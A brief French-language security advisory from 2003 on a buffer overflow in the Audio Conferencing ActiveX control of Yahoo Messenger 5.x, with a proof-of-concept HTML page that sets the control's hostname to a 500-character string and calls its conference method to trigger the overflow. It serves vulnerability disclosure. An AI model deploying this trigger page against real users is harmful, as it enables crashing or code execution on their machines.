Yahoo Messenger Audio Conferencing ActiveX buffer overflow

 Date de Publication: 2003-06-02
 Titre:
Yahoo Messenger Audio Conferencing ActiveX buffer overflow
 K-Otik ID : 0134
 Exploitable à distance : Oui
 Exploitable en local : Oui

 
 * Description Technique - Exploit *
 
Yahoo Messenger souffre d'une faille de sécurité de type buffer overflow. Cette vulnérabilité touche le module "
Audio Conferencing" ce qui permettrait à un attaquant d'exécuter du code arbitraire, en plaçant un long argument (500 caractères) dans l'option "hostname" d'ActiveX, ce qui produira le BOF.


------------------------sample.htm------------------------------
<OBJECT id=yahooaudio type="application/x-oleobject"
      
classid="clsid:2B323CD9-50E3-11D3-9466-00A0C9700498">
</OBJECT>
<script>
yahooaudio.hostname="AAAAA.....[500 caractères].......A";
yahooaudio.createandjoinconference();
</script>
-------------------------------------------------------------------



  * Versions Vulnérables *

Yahoo Messenger versions 5.x
 

  * Solution *




  * Crédits *
 
Faille découverte par
Cesar (Juin 2003).